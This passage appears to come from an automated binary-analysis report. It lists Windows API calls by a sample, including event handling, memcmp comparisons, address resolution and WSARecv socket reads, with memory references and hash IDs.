                                                                                      • SetEvent.KERNEL32(00000000,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E41
                                                                                      • CloseHandle.KERNEL32(00000000,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E4D
                                                                                      • WaitForSingleObject.KERNEL32(0594BB73,000000FF,?,05948E0E,00000000,0594BB73,0594BBBA,0596EEE0,0594BBC2,0594BB73,00000000), ref: 05948E58
                                                                                      • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 4206309166-0
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DD30,0000000E), ref: 059450F7
                                                                                      • memcmp.MSVCRT(?,0596DD20,0000000E), ref: 05945119
                                                                                      • memcmp.MSVCRT(?,0596DD10,0000000E), ref: 0594513B
                                                                                      • memcmp.MSVCRT(?,0596DD00,0000000E), ref: 0594515D
                                                                                      • memcmp.MSVCRT(?,0596DCF0,0000000E), ref: 0594517F
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      APIs
                                                                                      • memcmp.MSVCRT(?,0596DCE0,0000000F), ref: 059451BA
                                                                                      • memcmp.MSVCRT(?,0596DCD0,0000000F), ref: 059451D8
                                                                                      • memcmp.MSVCRT(?,0596DCC0,0000000F), ref: 059451FA
                                                                                      • memcmp.MSVCRT(?,0596DCB0,0000000F), ref: 0594521C
                                                                                      • API ID: memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1475443563-0
                                                                                      APIs
                                                                                      Strings
                                                                                      • API ID: callocfree
                                                                                      • String ID: P
                                                                                      • API String ID: 306872129-3110715001
                                                                                      APIs
                                                                                      • API ID: AddrFreeInfogetaddrinfohtonsmemset
                                                                                      • String ID:
                                                                                      • API String ID: 928751204-0
                                                                                      APIs
                                                                                      • WSARecv.WS2_32(?,?,00000001,00000000,?,00000000,00000000), ref: 0594A641
                                                                                      • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,?), ref: 0594A6F2
                                                                                      Strings
                                                                                      • API ID: ErrorLastRecv
                                                                                      • String ID: E'
                                                                                      • API String ID: 904507345-3751625834